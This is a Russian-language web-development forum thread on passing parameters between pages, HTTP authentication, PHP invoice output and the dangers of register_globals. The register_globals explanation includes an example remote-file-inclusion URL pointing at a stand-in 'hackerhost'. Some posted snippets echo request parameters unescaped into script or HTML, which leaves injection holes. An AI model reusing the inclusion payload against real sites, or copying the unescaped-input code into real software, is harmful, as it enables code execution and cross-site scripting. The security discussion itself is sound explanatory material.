У меня очень большой вопрос, Как при открытии этого окна заставить перейти по определенной ссылке главное окно?
Подскажите пожалуйсто.
Добавлено спустя 54 минуты, 10 секунд:
И еще очень нужно узнать: на многих сайтах видела "секретные" формы ввода логина и пароля...
Типа пользователь нажимает на <a href=что-то>.</a> и ему открывается виндовское окошечко с предложением ввода логина и пароля (что-то типа vpn)... Подскажите функцию для этого...
Member
Статус: Не в сети Регистрация: 03.01.2004 Откуда: Питер
Народ, подскажите плз. как с помощью JS передать параметр через ссылку с одной страницы на другую и принять его?
К примеру на стр1 есть переменная n, как передать ее через ссылку на другую страницу и принять ее?
ЗЫ давно уже ищу решение, нашел только как передать, щас не помню точно но вроде через ? делается...
_________________ Здесь так мало тех, с кем легко говорить,
Еще меньше тех, с кем не страшно молчать (c)
Member
Статус: Не в сети Регистрация: 02.08.2005 Откуда: Казань
ElMory
Цитата:
И еще очень нужно узнать: на многих сайтах видела "секретные" формы ввода логина и пароля... Типа пользователь нажимает на <a href=что-то>.</a> и ему открывается виндовское окошечко
А это уже элементарная HTTP-авторизация. Это уже настраивается на уровне конфигурации сервера, например в .htaccess. Так называемые "защищенные" файлы или каталоги. Скрипты тут не причем.
Lord_of_Darkness Тут разве что передать переменную из Javascript в сессию PHP, или через GET, или даже POST путем подстановки ее в hidden-поле.. Тогда понадобится только в начале проинициализировать переменную в JS на странице, которой она передалась, распечатав ее. Например так:
Код:
<script> myVar = <?=$_REQUEST['jsvar']?> .... // Работаем с myVar </script>
_________________ Feci quod potui, faciant meliora potentes.
Здраствуйте!! у меня возникла следующая трудность... Я формирую страничку - счёт фатуру из таблицы(SQL)... так вот возниклас следующая проблемма т.к. это документ то он должен соответствовать образцу и образец такого вида например:
Поставщик: ЗАО Ремпуть111111111111111111111111111111 Покупатель: АО ССГПО
как сделать чтобы правый столбец всегда на доступную шырину был подчёркнут не зависимо от длины текста?
Member
Статус: Не в сети Регистрация: 28.03.2005 Откуда: Латвия, Рига
Код:
<?php $db = mysql_connect('host', 'user', 'pass'); mysql_select_db('my_database'); $res = mysql_query("SELECT * FROM my_table WHERE somefield = 'someValue'"); // если запись только одна, то тогда можно так: $data = mysql_fetch_assoc($res); echo 'Производитель: <b>'.$data['имя_поставщика'].'</b><br>'; echo 'Покупатель: <b>'.$data['имя_покупателя'].'</b>'; // и.т.д. ?>
Думаю далее идея ясна
Добавлено спустя 38 секунд:
ElMory писал(а):
Moduvator Это что-бы получить дополнительный доступ к динамическому сайту........ Можно поподробней???
Что ты подразумеваешь под словом "динамический доступ" ?
_Psih 1. Есть такой сайтик www.pgpru.com Так вот там в левом верхнем углу была точечка, при нажатии на которую открывалась менюшка (не страница и не всплывающее окно) с просьбой ввести логин и пароль...
Member
Статус: Не в сети Регистрация: 28.03.2005 Откуда: Латвия, Рига
ElMory писал(а):
_Psih 1. Есть такой сайтик www.pgpru.com Так вот там в левом верхнем углу была точечка, при нажатии на которую открывалась менюшка (не страница и не всплывающее окно) с просьбой ввести логин и пароль...
Member
Статус: Не в сети Регистрация: 02.08.2005 Откуда: Казань
Nec Не вдаваясь в детали - со включеным register_globals скрипты получаются более уязвимыми. А во-вторых, и это самое важное - сценарий, корректно работающий с register_globals=off будет корректно работать и с включенным параметром, но не наоборот.
_________________ Feci quod potui, faciant meliora potentes.
Очень сомнительно по поводу пункта 1.
и каким это образом более уязвимые?
в обоих случаях ведь в уязвимых местах делается проверка на содержание переменной. типа там ааддслеши стриптэги проверко на число... и т.п.
ведь вредоносный код в переменную запихивают не в зависимости от регистер_глобалс
Member
Статус: Не в сети Регистрация: 18.11.2002 Откуда: не вернуться
Nec register_globals позволяет задавать не только те переменные которые вы проверяете а все что только можно это и приводит к повышеной опасности так что ваши доводы пожалуй слегка легкомысленны и я даже сказал бы "глуповаты" (не в обиду было сказано)
_________________ Летели гуси-лебеди, а им навстречу - воробьи-пингвины и соловьи-страусы...
Member
Статус: Не в сети Регистрация: 02.08.2005 Откуда: Казань
Nec Первый пример уязвимости:
Код:
<? //*** Здесь устанавливается переменная $root //*** .... include $root."/library.php"; ?>
Если в коде выше переменная $root по ошибке не проинициализируется (это может случиться по разным причинам), злоумышленник сможет запустить на сервере любой код, открыв следующий адрес в броузере: http://example.com/script.php?root=http://hackerhost
Конечно, этот пример может показаться надуманным. Таким он по сути и является: эта проблема может проявиться только в сложных скриптах, насчитывающих несколько файлов, включающих друг друга. Там бывает весьма непросто уследить за глобальными переменными. Например, в этом самом форуме - phpBB неоднократно находились и устранялись уязвимости подобного рода.
Более простой пример - массивы. Многие люди просто пишут в своих программах
К чему ведет пропуск artefacts = array(); в начале скрипта? Да к тому, что передав специально подобраную строку запроса, хакер сможет добавить в массив произвольные элементы. Например, он запустит сценарий так:
http://example.com/script.php?artefacts[reboot]=yes При этом в программе с пропущеным обнулением массива, в него будут помещены три элемента, а не два. Скрипт может на это никак не расчитывать, что в свою очередь может породить проблемы с безопасностью.
_________________ Feci quod potui, faciant meliora potentes.
Member
Статус: Не в сети Регистрация: 02.08.2005 Откуда: Казань
Рассмотрим также в каком порядке записываются данные в массив $_REQUEST, а также в глобальные переменные при включенном register_globals. Этот порядок вообще говоря важен.
Например, пусть у нас есть параметр А=10, поступивший из QUERY_STRING, параметр А=20 из POST-запроса, и cookie A=30. По умолчанию трансляция выполняется в подрядке GET-POST-COOKIE (GPC), причем каждая следующая переменная перекрывает предыдущее свое значение. Поэтому в нашем примере в ячейке массива $_REQUEST['A'] будет значение 30.
В режиме register_globals в глобальные переменные также попадут переменные окружения. Записываются они в соответствии со схемой ENVIRONMENT-GET-POST-COOKIE (EGPC). Иными словами, переменные окружения в режиме register_globals перекрываются даже GET-данными, и злоумышленник может легко подделать любую из них, передав соответствующую QUERY_STRING при запуске сценария. Поэтому, если мы хотим получить доступ к переменным окружения, то обращаться к ним следует либо через массив $_SERVER или через функцию getenv(), чтобы избежать неприятностей.
А включенный режим register_globals провоцирует программиста "лениться", просто обращаясь к глобальным переменным.. К чему это может привести - думаю, вы догадываетесь сами..
_________________ Feci quod potui, faciant meliora potentes.
Member
Статус: Не в сети Регистрация: 03.01.2004 Откуда: Питер
Здравствуйте, это снова я Но на этот раз с ответом на свой вопрос. Как горица кто ищет - тот всегда ченить накопает...
Вот нашел как параметр передать и принять
Код:
Q: Как передать параметры с одной страницы на другую? A: --- Файл page1.htm --- <html> <head> <title>1st page</title> </head> <body> <!-- передаем параметры со значениями value1 и value2 на страницу
page2.htm пары параметр-значение разделяются символом & --> <a href="page2.htm?param1=value1¶m2=value2">Go to 2nd page</a> </body>
</html>
--- Файл page2.htm ---
<html>
<head> <title>2nd page</title> <script language="javascript" type="text/javascript"> <!-- /* Функция считывает параметр по имени */ function getPar(name) { paramStr = window.location.search; begin = paramStr.indexOf(name) + name.length + 1; end = paramStr.indexOf('&', begin); if(end == -1) end = paramStr.length; return unescape(paramStr.substring(begin, end)); } //--> </script> </head>
<body> <script language="javascript" type="text/javascript"> <!-- /* Считываем параметры */ var s = 'Parameters from 1st page:<br><br>'; s += 'Param1 = ' + getPar('param1') + '<br>'; s += 'Param2 = ' + getPar('param2'); /* Вывод в браузер */ document.write(s); //--> </script> </body>
</html>
Причем в самом неожиданном месте - в FAQ на хоботе
А как это выглядит в действии можно посмотреть тут
_________________ Здесь так мало тех, с кем легко говорить,
Еще меньше тех, с кем не страшно молчать (c)
Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете добавлять вложения